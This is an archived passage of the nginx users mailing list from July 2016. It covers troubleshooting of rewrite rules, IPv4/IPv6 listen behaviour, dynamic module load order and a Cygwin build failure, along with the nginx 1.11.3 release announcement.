> expandable thing should use a macro processor to turn it into as many
> static things as are needed, and then let nginx read the static things.
>
> In some cases, someone has written the code to use a $variable in a
> directive. In the case of the "location" directive this has not happened,
> and I suspect will not happen, in stock nginx.
>
> What you are describing is, in nginx terms, the job of a macro
> processor. Use the one you already know to generate the bunch of similar
> rules. If the rules fragments are *identical*, you could use the nginx
> "include" directive, which is about the limit of the built-in "macro"
> processor. (That is to say: not a macro processor at all.)

Did I say it is a pity?

> From the words I've seen, this looks like it should work. If not, I'm
> happy to try guessing again.

I'm satisfied with your care:
You told me in the first message that it can't work the way I was trying, so no more headaches.
You pointed out some cosmetic changes/improvements to my config.
You spent more time than deserved answering these questions.

So, thank you very much. I'll go for the "one long file" option, duplicating a few lines for each.

Have a great week,

Regards
-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From nginx-forum at forum.nginx.org Tue Jul 26 07:46:19 2016
From: nginx-forum at forum.nginx.org (iivan)
Date: Tue, 26 Jul 2016 03:46:19 -0400
Subject: Full URL parameter in nginx
In-Reply-To: <20160725233537.GY12280@daoine.org>
References: <20160725233537.GY12280@daoine.org>
Message-ID: 

Hi Francis, first of all, thank you for your intervention. Look:

## nginx rule:
rewrite ^/(.*)?$ /index.cfm?event=saveURL=$1$is_args$args last;

## this URL:
http://www.mywebsite.com/http://www.anotherwebsite.com/index.php?lvl=cmspage&pageid=14&id_article=52

## Return only:
http://www.anotherwebsite.com/index.php?lvl=cmspage

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,267813,268462#msg-268462

From daniel at mostertman.org Tue Jul 26 08:45:50 2016
From: daniel at mostertman.org (Daniel Mostertman)
Date: Tue, 26 Jul 2016 10:45:50 +0200
Subject: Nginx not spawning both ipv4 and ipv6 workers
In-Reply-To: References: Message-ID: 

Hi Charles,

IPv6 listeners can also accept IPv4 requests. This will result in IPs being passed through to logs and such like ::ffff:192.168.123.101. If you do not want this and do want both, add ipv6only=on to the IPv6 listen line.

Daniël

On Jul 26, 2016 02:25, "Charles Lawrence" wrote:
> I'm in the process of setting up a new server built on ubuntu 16.04
> using nginx 1.10.0.
>
> The specific issue is that while my new configuration essentially
> matches my old nginx configuration from an ubuntu 13.10 server using
> nginx 1.4.4, nginx 1.10.0 is only creating either ipv4 or ipv6
> workers, but not both. This behavior is not present on the old server.
> Not sure what else to try at this point.
>
> I've verified that my nginx installation was built with ipv6.
> > > nginx version: nginx/1.10.0 (Ubuntu) > > built with OpenSSL 1.0.2g-fips 1 Mar 2016 > > TLS SNI support enabled > > configure arguments: --with-cc-opt='-g -O2 -fPIE > -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time > -D_FORTIFY_SOURCE=2' --with-ld-opt='-Wl,-Bsymbolic-functions -fPIE -pie > -Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx > --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log > --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock > --pid-path=/run/nginx.pid --http-client-body-temp-path=/var/lib/nginx/body > --http-fastcgi-temp-path=/var/lib/nginx/fastcgi > --http-proxy-temp-path=/var/lib/nginx/proxy > --http-scgi-temp-path=/var/lib/nginx/scgi > --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit > --with-ipv6 --with-http_ssl_module --with-http_stub_status_module > --with-http_realip_module --with-http_auth_request_module > --with-http_addition_module --with-http_dav_module --with-http_geoip_module > --with-http_gunzip_module --with-http_gzip_static_module > --with-http_image_filter_module --with-http_v2_module --with-htt > p_sub_module --with-http_xslt_module --with-stream > --with-stream_ssl_module --with-mail --with-mail_ssl_module --with-threads > > Below are my current configurations for the new server: > > ># /etc/nginx/nginx.conf> user www-data; > > worker_rlimit_nofile 30000; > > worker_processes 8; > > pid /run/nginx.pid; > > > > events { > > worker_connections 500000; > > } > > > > http { > > sendfile on; > > tcp_nopush on; > > tcp_nodelay on; > > keepalive_timeout 65; > > types_hash_max_size 2048; > > > > include /etc/nginx/mime.types; > > default_type application/octet-stream; > > > > ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE > > ssl_prefer_server_ciphers on; > > > > access_log /var/log/nginx/access.log; > > error_log /var/log/nginx/error.log; > > > > gzip on; > > gzip_disable "msie6"; > > gzip_vary on; > > gzip_proxied 
any; > > gzip_comp_level 6; > > gzip_buffers 16 8k; > > gzip_http_version 1.1; > > gzip_types text/plain text/css application/json application/javascript > text/xml application/xml application/xml+rss text/javascript; > > > > include /etc/nginx/conf.d/*.conf; > > include /etc/nginx/sites-enabled/*; > > } > > Lastly, the weird thing is whether the workers get bound to ipv4 or > ipv6 entirely depends on the order in which the listen directives are > placed. In the following data, I've switched the order and tried > different configurations multiple times. After each change to > /etc/nginx/sites-enabled/blog I did sudo service nginx stop; sudo > service nginx start; sudo lsof -i;to get the data. > > Also note that I changed the workers count to 8 after performing these > steps. However while the number of workers increased, the same > behavior was seen where all workers were either ipv4 or ipv6. > > > listen [::]:80; > > listen 80; > > nginx 27675 root 6u IPv4 204423 0t0 TCP *:http (LISTEN) > > nginx 27676 www-data 6u IPv4 204423 0t0 TCP *:http (LISTEN) > > > > listen 80; > > listen [::]:80; > > nginx 27747 root 6u IPv6 205134 0t0 TCP *:http (LISTEN) > > nginx 27748 www-data 6u IPv6 205134 0t0 TCP *:http (LISTEN) > > > > listen 80; > > listen [::]:80 default ipv6only=on; > > nginx 27819 root 6u IPv6 205849 0t0 TCP *:http (LISTEN) > > nginx 27820 www-data 6u IPv6 205849 0t0 TCP *:http (LISTEN) > > > > listen 80; > > listen [::]:80 default ipv6only=off; > > nginx 27885 root 6u IPv6 206495 0t0 TCP *:http (LISTEN) > > nginx 27886 www-data 6u IPv6 206495 0t0 TCP *:http (LISTEN) > > > > listen 80; > > listen [::]:80 default; > > nginx 27953 root 6u IPv6 207184 0t0 TCP *:http (LISTEN) > > nginx 27954 www-data 6u IPv6 207184 0t0 TCP *:http (LISTEN) > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... 
URL:

From nginx-forum at forum.nginx.org Tue Jul 26 11:17:05 2016
From: nginx-forum at forum.nginx.org (ndrini)
Date: Tue, 26 Jul 2016 07:17:05 -0400
Subject: basic question about
Message-ID: 

I have this server block on an EC2 nginx webserver.

server {
    listen 80 default_server;
    root /home/a/all;
    index index.html;
    location / {
        try_files $uri $uri/ =404;
    }
}

My idea is that all the sites pointing to the server should show the same page: index.html, located at /home/a/all/index.html. But I get a 403 Forbidden nginx/1.4.6 (Ubuntu) :( Why?

Thanks,
Andrea

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268466,268466#msg-268466

From mdounin at mdounin.ru Tue Jul 26 14:11:18 2016
From: mdounin at mdounin.ru (Maxim Dounin)
Date: Tue, 26 Jul 2016 17:11:18 +0300
Subject: nginx-1.11.3
Message-ID: <20160726141118.GC57459@mdounin.ru>

Changes with nginx 1.11.3                                        26 Jul 2016

*) Change: now the "accept_mutex" directive is turned off by default.

*) Feature: now nginx uses EPOLLEXCLUSIVE on Linux.

*) Feature: the ngx_stream_geo_module.

*) Feature: the ngx_stream_geoip_module.

*) Feature: the ngx_stream_split_clients_module.

*) Feature: variables support in the "proxy_pass" and "proxy_ssl_name" directives in the stream module.

*) Bugfix: socket leak when using HTTP/2.

*) Bugfix: in configure tests. Thanks to Piotr Sikora.

-- 
Maxim Dounin
http://nginx.org/

From kworthington at gmail.com Tue Jul 26 15:12:18 2016
From: kworthington at gmail.com (Kevin Worthington)
Date: Tue, 26 Jul 2016 11:12:18 -0400
Subject: [nginx-announce] nginx-1.11.3
In-Reply-To: <20160726141124.GD57459@mdounin.ru>
References: <20160726141124.GD57459@mdounin.ru>
Message-ID: 

Hello Nginx users,

Now available: Nginx 1.11.3 for Windows https://kevinworthington.com/nginxwin1113 (32-bit and 64-bit versions)

These versions are to support legacy users who are already using Cygwin based builds of Nginx. Officially supported native Windows binaries are at nginx.org.
Announcements are also available here: Twitter http://twitter.com/kworthington Google+ https://plus.google.com/+KevinWorthington/ Thank you, Kevin -- Kevin Worthington kworthington *@* (gmail] [dot} {com) http://kevinworthington.com/ http://twitter.com/kworthington https://plus.google.com/+KevinWorthington/ On Tue, Jul 26, 2016 at 10:11 AM, Maxim Dounin wrote: > Changes with nginx 1.11.3 26 Jul > 2016 > > *) Change: now the "accept_mutex" directive is turned off by default. > > *) Feature: now nginx uses EPOLLEXCLUSIVE on Linux. > > *) Feature: the ngx_stream_geo_module. > > *) Feature: the ngx_stream_geoip_module. > > *) Feature: the ngx_stream_split_clients_module. > > *) Feature: variables support in the "proxy_pass" and "proxy_ssl_name" > directives in the stream module. > > *) Bugfix: socket leak when using HTTP/2. > > *) Bugfix: in configure tests. > Thanks to Piotr Sikora. > > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx-announce mailing list > nginx-announce at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx-announce > -------------- next part -------------- An HTML attachment was scrubbed... URL: From kworthington at gmail.com Tue Jul 26 15:15:52 2016 From: kworthington at gmail.com (Kevin Worthington) Date: Tue, 26 Jul 2016 11:15:52 -0400 Subject: [nginx-announce] nginx-1.11.3 In-Reply-To: <20160726141124.GD57459@mdounin.ru> References: <20160726141124.GD57459@mdounin.ru> Message-ID: Hello! When building on Cygwin on Windows 7, using the --with-stream flag, it fails. 
Here is my configure with options:

./configure --with-http_ssl_module --with-http_gzip_static_module --with-pcre-jit --with-debug --with-http_addition_module --with-http_auth_request_module --with-http_dav_module --with-http_gzip_static_module --with-http_image_filter_module --with-http_realip_module --with-http_stub_status_module --with-http_ssl_module --with-http_sub_module --with-http_xslt_module --with-ipv6 --with-mail --with-mail_ssl_module

Output of section where it errors out:

cc -c -pipe -O -W -Wall -Wpointer-arith -Wno-unused-parameter -Werror -g -D FD_SETSIZE=2048 -I src/core -I src/event -I src/event/modules -I src/os/unix -I /usr/include/libxml2 -I objs -I src/stream \
-o objs/src/stream/ngx_stream_proxy_module.o \
src/stream/ngx_stream_proxy_module.c
src/stream/ngx_stream_proxy_module.c: In function `ngx_stream_proxy_handler':
src/stream/ngx_stream_proxy_module.c:542:6: error: `ngx_stream_upstream_t' has no member named `ssl_name'
u->ssl_name = uscf->host;
^
objs/Makefile:1520: recipe for target 'objs/src/stream/ngx_stream_proxy_module.o' failed
make[1]: *** [objs/src/stream/ngx_stream_proxy_module.o] Error 1
make[1]: Leaving directory '/home/kevin.worthington/nginx-1.11.3'
Makefile:8: recipe for target 'build' failed
make: *** [build] Error 2

I would appreciate any help. I'm not sure if this is a bug or just an incompatibility with Cygwin.

Thank you,
Kevin
-- 
Kevin Worthington
kworthington *@* (gmail] [dot} {com)
http://kevinworthington.com/
http://twitter.com/kworthington
https://plus.google.com/+KevinWorthington/

On Tue, Jul 26, 2016 at 10:11 AM, Maxim Dounin wrote:
> Changes with nginx 1.11.3                                        26 Jul 2016
>
> *) Change: now the "accept_mutex" directive is turned off by default.
>
> *) Feature: now nginx uses EPOLLEXCLUSIVE on Linux.
>
> *) Feature: the ngx_stream_geo_module.
>
> *) Feature: the ngx_stream_geoip_module.
>
> *) Feature: the ngx_stream_split_clients_module.
> > *) Feature: variables support in the "proxy_pass" and "proxy_ssl_name" > directives in the stream module. > > *) Bugfix: socket leak when using HTTP/2. > > *) Bugfix: in configure tests. > Thanks to Piotr Sikora. > > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx-announce mailing list > nginx-announce at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx-announce > -------------- next part -------------- An HTML attachment was scrubbed... URL: From vbart at nginx.com Tue Jul 26 16:16:55 2016 From: vbart at nginx.com (Valentin V. Bartenev) Date: Tue, 26 Jul 2016 19:16:55 +0300 Subject: [nginx-announce] nginx-1.11.3 In-Reply-To: References: <20160726141124.GD57459@mdounin.ru> Message-ID: <5612345.nGgU1JV34h@vbart-workstation> On Tuesday 26 July 2016 11:15:52 Kevin Worthington wrote: > Hello! > > When building on Cygwin on Windows 7, using the --with-stream flag, it > fails. [..] See: https://trac.nginx.org/nginx/ticket/1032 wbr, Valentin V. Bartenev From mdounin at mdounin.ru Tue Jul 26 16:42:06 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 26 Jul 2016 19:42:06 +0300 Subject: Nginx not spawning both ipv4 and ipv6 workers In-Reply-To: References: Message-ID: <20160726164206.GH57459@mdounin.ru> Hello! On Mon, Jul 25, 2016 at 05:24:46PM -0700, Charles Lawrence wrote: > I'm in the process of setting up a new server built on ubuntu 16.04 > using nginx 1.10.0. > > The specific issue is that while my new configuration essentially > matches my old nginx configuration from an ubuntu 13.10 server using > nginx 1.4.4, nginx 1.10.0 is only creating either ipv4 or ipv6 > workers, but not both. This behavior is not present on the old server. > Not sure what else to try at this point. Workers are not bound to IPv6 / IPv4. Instead, all workers listen on all listening sockets configured. [...] 
> > include /etc/nginx/conf.d/*.conf; > > include /etc/nginx/sites-enabled/*; > > } Note: such configurations are very error-prone, as all files from a directory are included without any filtering. This is known to cause unintended inclusion of various "swap", "temp" and "backup" files. For proper testing you may want to comment out the "include" directives, and use server{} blocks directly written in nginx.conf. > Lastly, the weird thing is whether the workers get bound to ipv4 or > ipv6 entirely depends on the order in which the listen directives are > placed. In the following data, I've switched the order and tried > different configurations multiple times. After each change to > /etc/nginx/sites-enabled/blog I did sudo service nginx stop; sudo > service nginx start; sudo lsof -i;to get the data. > > Also note that I changed the workers count to 8 after performing these > steps. However while the number of workers increased, the same > behavior was seen where all workers were either ipv4 or ipv6. > > > listen [::]:80; > > listen 80; > > nginx 27675 root 6u IPv4 204423 0t0 TCP *:http (LISTEN) > > nginx 27676 www-data 6u IPv4 204423 0t0 TCP *:http (LISTEN) > > > > listen 80; > > listen [::]:80; > > nginx 27747 root 6u IPv6 205134 0t0 TCP *:http (LISTEN) > > nginx 27748 www-data 6u IPv6 205134 0t0 TCP *:http (LISTEN) > > > > listen 80; > > listen [::]:80 default ipv6only=on; > > nginx 27819 root 6u IPv6 205849 0t0 TCP *:http (LISTEN) > > nginx 27820 www-data 6u IPv6 205849 0t0 TCP *:http (LISTEN) > > > > listen 80; > > listen [::]:80 default ipv6only=off; > > nginx 27885 root 6u IPv6 206495 0t0 TCP *:http (LISTEN) > > nginx 27886 www-data 6u IPv6 206495 0t0 TCP *:http (LISTEN) Note: such a configuration is not expected to start at all on Linux, as IPv6 socket [::]:80 with IPV6_V6ONLY option set to "off" will conflict with IPv4 socket *:80. That is, "sudo service nginx start" is expected to fail. 
If it doesn't - this indicates that you are testing something different.

To further debug what's going on, consider:

- using a minimal config directly in nginx.conf, see above;

- starting nginx yourself by hand instead of using startup scripts, this will ensure that this isn't something caused by startup scripts;

- make sure to examine all sockets as printed by lsof, and verify the results using other tools (e.g., "ss -nlt").

-- 
Maxim Dounin
http://nginx.org/

From kworthington at gmail.com Tue Jul 26 16:46:06 2016
From: kworthington at gmail.com (Kevin Worthington)
Date: Tue, 26 Jul 2016 12:46:06 -0400
Subject: [nginx-announce] nginx-1.11.3
In-Reply-To: <5612345.nGgU1JV34h@vbart-workstation>
References: <20160726141124.GD57459@mdounin.ru> <5612345.nGgU1JV34h@vbart-workstation>
Message-ID: 

Great, thank you Valentin.

Best regards,
Kevin
-- 
Kevin Worthington
kworthington *@* (gmail] [dot} {com)
http://kevinworthington.com/
http://twitter.com/kworthington
https://plus.google.com/+KevinWorthington/

On Tue, Jul 26, 2016 at 12:16 PM, Valentin V. Bartenev wrote:
> On Tuesday 26 July 2016 11:15:52 Kevin Worthington wrote:
> > Hello!
> >
> > When building on Cygwin on Windows 7, using the --with-stream flag, it
> > fails.
> [..]
>
> See: https://trac.nginx.org/nginx/ticket/1032
>
> wbr, Valentin V. Bartenev
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From maxim at nginx.com Tue Jul 26 17:05:51 2016
From: maxim at nginx.com (Maxim Konovalov)
Date: Tue, 26 Jul 2016 20:05:51 +0300
Subject: [nginx-announce] nginx-1.11.3
In-Reply-To: References: <20160726141124.GD57459@mdounin.ru> <5612345.nGgU1JV34h@vbart-workstation>
Message-ID: <4c8c0a96-866a-900d-6f28-296bc7f9ad49@nginx.com>

On 7/26/16 7:46 PM, Kevin Worthington wrote:
> Great, thank you Valentin.
>
That was just fixed.
> Best regards, > Kevin > -- > Kevin Worthington > kworthington *@* (gmail] [dot} {com) > http://kevinworthington.com/ > http://twitter.com/kworthington > https://plus.google.com/+KevinWorthington/ > > On Tue, Jul 26, 2016 at 12:16 PM, Valentin V. Bartenev > > wrote: > > On Tuesday 26 July 2016 11:15:52 Kevin Worthington wrote: > > Hello! > > > > When building on Cygwin on Windows 7, using the --with-stream flag, it > > fails. > [..] > > See: https://trac.nginx.org/nginx/ticket/1032 > > wbr, Valentin V. Bartenev > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- Maxim Konovalov From nginx-forum at forum.nginx.org Tue Jul 26 18:38:19 2016 From: nginx-forum at forum.nginx.org (George) Date: Tue, 26 Jul 2016 14:38:19 -0400 Subject: nginx-1.11.3 In-Reply-To: <20160726141118.GC57459@mdounin.ru> References: <20160726141118.GC57459@mdounin.ru> Message-ID: trying to enable ngx_stream_geoip_module as a dynamic module and getting this error ONLY on SOME servers and not others all compiled with same settings ? 
nginx -t nginx: [emerg] dlopen() "/usr/local/nginx/modules/ngx_stream_geoip_module.so" failed (/usr/local/nginx/modules/ngx_stream_geoip_module.so: undefined symbol: ngx_stream_add_variable) in /usr/local/nginx/conf/dynamic-modules.conf:3 nginx: configuration file /usr/local/nginx/conf/nginx.conf test failed /usr/local/nginx/conf/dynamic-modules.conf include file in nginx.conf load_module "modules/ngx_http_image_filter_module.so"; load_module "modules/ngx_http_fancyindex_module.so"; load_module "modules/ngx_stream_geoip_module.so"; load_module "modules/ngx_http_geoip_module.so"; load_module "modules/ngx_stream_module.so"; configure ./configure --with-ld-opt="-lrt -ljemalloc -Wl,-z,relro -Wl,-rpath,/usr/local/lib" --with-cc-opt="-m64 -mtune=native -mfpmath=sse -g -O3 -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wno-sign-compare -Wno-string-plus-int -Wno-deprecated-declarations -Wno-unused-parameter -Wno-unused-const-variable -Wno-conditional-uninitialized -Wno-mismatched-tags -Wno-c++11-extensions -Wno-sometimes-uninitialized -Wno-parentheses-equality -Wno-tautological-compare -Wno-self-assign -Wno-deprecated-register -Wno-deprecated -Wno-invalid-source-encoding -Wno-pointer-sign -Wno-parentheses -Wno-enum-conversion -Wno-c++11-compat-deprecated-writable-strings -Wno-write-strings" --sbin-path=/usr/local/sbin/nginx --conf-path=/usr/local/nginx/conf/nginx.conf --with-http_stub_status_module --with-http_secure_link_module --with-openssl-opt="enable-tlsext" --add-module=../nginx-module-vts --with-libatomic --with-threads --with-stream=dynamic --with-stream_ssl_module --with-http_gzip_static_module --with-http_sub_module --with-http_addition_module --with-http_image_filter_module=dynamic --with-http_geoip_module=dynamic --with-stream_geoip_module=dynamic --with-http_realip_module --add-dynamic-module=../ngx-fancyindex-0.4.0 --add-module=../ngx_cache_purge-2.3 --add-module=../ngx_devel_kit-0.3.0 
--add-module=../set-misc-nginx-module-0.30 --add-module=../echo-nginx-module-0.59 --add-module=../redis2-nginx-module-0.13 --add-module=../ngx_http_redis-0.3.7 --add-module=../memc-nginx-module-0.17 --add-module=../srcache-nginx-module-0.31 --add-module=../headers-more-nginx-module-0.30 --with-pcre=../pcre-8.39 --with-pcre-jit --with-http_ssl_module --with-http_v2_module --with-openssl=../libressl-2.3.6 checking for OS + Linux 4.5.5-x86_64-linode69 x86_64 checking for C compiler ... found + using Clang C compiler + clang version: 3.4.2 (tags/RELEASE_34/dot2-final) checking for --with-ld-opt="-lrt -ljemalloc -Wl,-z,relro -Wl,-rpath,/usr/local/lib" ... found checking for -Wl,-E switch ... found checking for gcc builtin atomic operations ... found checking for C99 variadic macros ... found checking for gcc variadic macros ... found checking for gcc builtin 64 bit byteswap ... found checking for unistd.h ... found checking for inttypes.h ... found checking for limits.h ... found checking for sys/filio.h ... not found checking for sys/param.h ... found checking for sys/mount.h ... found checking for sys/statvfs.h ... found checking for crypt.h ... found checking for Linux specific features checking for epoll ... found checking for EPOLLRDHUP ... found checking for EPOLLEXCLUSIVE ... not found checking for O_PATH ... found checking for sendfile() ... found checking for sendfile64() ... found checking for sys/prctl.h ... found checking for prctl(PR_SET_DUMPABLE) ... found checking for sched_setaffinity() ... found checking for crypt_r() ... found checking for sys/vfs.h ... found checking for nobody group ... found checking for poll() ... found checking for /dev/poll ... not found checking for kqueue ... not found checking for crypt() ... not found checking for crypt() in libcrypt ... found checking for F_READAHEAD ... not found checking for posix_fadvise() ... found checking for O_DIRECT ... found checking for F_NOCACHE ... not found checking for directio() ... 
not found checking for statfs() ... found checking for statvfs() ... found checking for dlopen() ... not found checking for dlopen() in libdl ... found checking for sched_yield() ... found checking for SO_SETFIB ... not found checking for SO_REUSEPORT ... found checking for SO_ACCEPTFILTER ... not found checking for SO_BINDANY ... not found checking for IP_BIND_ADDRESS_NO_PORT ... not found checking for IP_TRANSPARENT ... found checking for IP_BINDANY ... not found checking for IP_RECVDSTADDR ... not found checking for IP_PKTINFO ... found checking for IPV6_RECVPKTINFO ... found checking for TCP_DEFER_ACCEPT ... found checking for TCP_KEEPIDLE ... found checking for TCP_FASTOPEN ... found checking for TCP_INFO ... found checking for accept4() ... found checking for eventfd() ... found checking for int size ... 4 bytes checking for long size ... 8 bytes checking for long long size ... 8 bytes checking for void * size ... 8 bytes checking for uint32_t ... found checking for uint64_t ... found checking for sig_atomic_t ... found checking for sig_atomic_t size ... 4 bytes checking for socklen_t ... found checking for in_addr_t ... found checking for in_port_t ... found checking for rlim_t ... found checking for uintptr_t ... uintptr_t found checking for system byte ordering ... little endian checking for size_t size ... 8 bytes checking for off_t size ... 8 bytes checking for time_t size ... 8 bytes checking for setproctitle() ... not found checking for pread() ... found checking for pwrite() ... found checking for pwritev() ... found checking for sys_nerr ... found checking for localtime_r() ... found checking for posix_memalign() ... found checking for memalign() ... found checking for mmap(MAP_ANON|MAP_SHARED) ... found checking for mmap("/dev/zero", MAP_SHARED) ... found checking for System V shared memory ... found checking for POSIX semaphores ... not found checking for POSIX semaphores in libpthread ... found checking for struct msghdr.msg_control ... 
found checking for ioctl(FIONBIO) ... found checking for struct tm.tm_gmtoff ... found checking for struct dirent.d_namlen ... not found checking for struct dirent.d_type ... found checking for sysconf(_SC_NPROCESSORS_ONLN) ... found checking for openat(), fstatat() ... found checking for getaddrinfo() ... found configuring additional modules adding module in ../nginx-module-vts + ngx_http_vhost_traffic_status_module was configured adding module in ../ngx_cache_purge-2.3 + ngx_http_cache_purge_module was configured adding module in ../ngx_devel_kit-0.3.0 + ngx_devel_kit was configured adding module in ../set-misc-nginx-module-0.30 found ngx_devel_kit for ngx_set_misc; looks good. + ngx_http_set_misc_module was configured adding module in ../echo-nginx-module-0.59 + ngx_http_echo_module was configured adding module in ../redis2-nginx-module-0.13 + ngx_http_redis2_module was configured adding module in ../ngx_http_redis-0.3.7 + ngx_http_redis_module was configured adding module in ../memc-nginx-module-0.17 + ngx_http_memc_module was configured adding module in ../srcache-nginx-module-0.31 + ngx_http_srcache_filter_module was configured adding module in ../headers-more-nginx-module-0.30 + ngx_http_headers_more_filter_module was configured configuring additional dynamic modules adding module in ../ngx-fancyindex-0.4.0 + ngx_http_fancyindex_module was configured checking for zlib library ... found checking for GD library ... found checking for GeoIP library ... found checking for atomic_ops library ... found creating objs/Makefile Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268473,268514#msg-268514 From mdounin at mdounin.ru Tue Jul 26 18:44:32 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 26 Jul 2016 21:44:32 +0300 Subject: nginx-1.11.3 In-Reply-To: References: <20160726141118.GC57459@mdounin.ru> Message-ID: <20160726184432.GI57459@mdounin.ru> Hello! 
On Tue, Jul 26, 2016 at 02:38:19PM -0400, George wrote: > trying to enable ngx_stream_geoip_module as a dynamic module and getting > this error ONLY on SOME servers and not others all compiled with same > settings ? > > nginx -t > nginx: [emerg] dlopen() > "/usr/local/nginx/modules/ngx_stream_geoip_module.so" failed > (/usr/local/nginx/modules/ngx_stream_geoip_module.so: undefined symbol: > ngx_stream_add_variable) in /usr/local/nginx/conf/dynamic-modules.conf:3 > nginx: configuration file /usr/local/nginx/conf/nginx.conf test failed > > /usr/local/nginx/conf/dynamic-modules.conf include file in nginx.conf > > load_module "modules/ngx_http_image_filter_module.so"; > load_module "modules/ngx_http_fancyindex_module.so"; > load_module "modules/ngx_stream_geoip_module.so"; > load_module "modules/ngx_http_geoip_module.so"; > load_module "modules/ngx_stream_module.so"; You have to load stream geoip module after the stream module is loaded. That is, change the order of lines: load_module "modules/ngx_stream_module.so"; load_module "modules/ngx_stream_geoip_module.so"; -- Maxim Dounin http://nginx.org/ From francis at daoine.org Tue Jul 26 18:55:07 2016 From: francis at daoine.org (Francis Daly) Date: Tue, 26 Jul 2016 19:55:07 +0100 Subject: Full URL parameter in nginx In-Reply-To: References: <20160725233537.GY12280@daoine.org> Message-ID: <20160726185507.GZ12280@daoine.org> On Tue, Jul 26, 2016 at 03:46:19AM -0400, iivan wrote: Hi there, > ## nginx rule: > rewrite ^/(.*)?$ /index.cfm?event=saveURL=$1$is_args$args last; > > ## this URL: > http://www.mywebsite.com/http://www.anotherwebsite.com/index.php?lvl=cmspage&pageid=14&id_article=52 > > > ## Return only: > http://www.anotherwebsite.com/index.php?lvl=cmspage That config will get nginx to do an internal rewrite to the location /index.cfm. What does your /index.cfm do? That is: nginx does not return http://www.anotherwebsite.com/index.php?lvl=cmspage, index.cfm does. 
You *could* try to do the proper encoding/escaping in the rewrite, but I am not aware of a simple nginx function that will help you. I *suspect* that if you replace rewrite ^/(.*)?$ /index.cfm?event=saveURL=$1$is_args$args last; with rewrite ^/(.*)?$ /index.cfm?event=saveURL=$1$is_args$args? last; (extra ? at the end), or, equivalently, with rewrite ^/(.*)?$ /index.cfm?event=saveURL=$1 last; (no ? at the end, and remove $is_args$args), then you will be able to tell your /index.cfm to use all of the QUERY_STRING after "event=saveURL=" as the bulk of the thing that should be returned, and it might all do what you want. Good luck with it, f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Tue Jul 26 19:06:34 2016 From: nginx-forum at forum.nginx.org (George) Date: Tue, 26 Jul 2016 15:06:34 -0400 Subject: nginx-1.11.3 In-Reply-To: <20160726184432.GI57459@mdounin.ru> References: <20160726184432.GI57459@mdounin.ru> Message-ID: thanks Maxim works now :) cat /usr/local/nginx/conf/dynamic-modules.conf load_module "modules/ngx_http_image_filter_module.so"; load_module "modules/ngx_http_fancyindex_module.so"; load_module "modules/ngx_stream_module.so"; load_module "modules/ngx_stream_geoip_module.so"; load_module "modules/ngx_http_geoip_module.so"; ngxrestart Restarting nginx (via systemctl): [ OK ] nginx -V nginx version: nginx/1.11.3 built by clang 3.4.2 (tags/RELEASE_34/dot2-final) built with LibreSSL 2.3.6 TLS SNI support enabled configure arguments: --with-ld-opt='-lrt -ljemalloc -Wl,-z,relro -Wl,-rpath,/usr/local/lib' --with-cc-opt='-m64 -mtune=native -mfpmath=sse -g -O3 -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wno-sign-compare -Wno-string-plus-int -Wno-deprecated-declarations -Wno-unused-parameter -Wno-unused-const-variable -Wno-conditional-uninitialized -Wno-mismatched-tags -Wno-c++11-extensions -Wno-sometimes-uninitialized -Wno-parentheses-equality -Wno-tautological-compare 
-Wno-self-assign -Wno-deprecated-register -Wno-deprecated -Wno-invalid-source-encoding -Wno-pointer-sign -Wno-parentheses -Wno-enum-conversion -Wno-c++11-compat-deprecated-writable-strings -Wno-write-strings' --sbin-path=/usr/local/sbin/nginx --conf-path=/usr/local/nginx/conf/nginx.conf --with-http_stub_status_module --with-http_secure_link_module --with-openssl-opt=enable-tlsext --add-module=../nginx-module-vts --with-libatomic --with-threads --with-stream=dynamic --with-stream_ssl_module --with-http_gzip_static_module --with-http_sub_module --with-http_addition_module --with-http_image_filter_module=dynamic --with-http_geoip_module=dynamic --with-stream_geoip_module=dynamic --with-http_realip_module --add-dynamic-module=../ngx-fancyindex-0.4.0 --add-module=../ngx_cache_purge-2.3 --add-module=../ngx_devel_kit-0.3.0 --add-module=../set-misc-nginx-module-0.30 --add-module=../echo-nginx-module-0.59 --add-module=../redis2-nginx-module-0.13 --add-module=../ngx_http_redis-0.3.7 --add-module=../memc-nginx-module-0.17 --add-module=../srcache-nginx-module-0.31 --add-module=../headers-more-nginx-module-0.30 --with-pcre=../pcre-8.39 --with-pcre-jit --with-http_ssl_module --with-http_v2_module --with-openssl=../libressl-2.3.6 Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268473,268517#msg-268517 From nginx-forum at forum.nginx.org Tue Jul 26 20:39:22 2016 From: nginx-forum at forum.nginx.org (geuis) Date: Tue, 26 Jul 2016 16:39:22 -0400 Subject: Nginx not spawning both ipv4 and ipv6 workers In-Reply-To: <20160726164206.GH57459@mdounin.ru> References: <20160726164206.GH57459@mdounin.ru> Message-ID: This is Charles, moving over to the forum interface rather than email. I 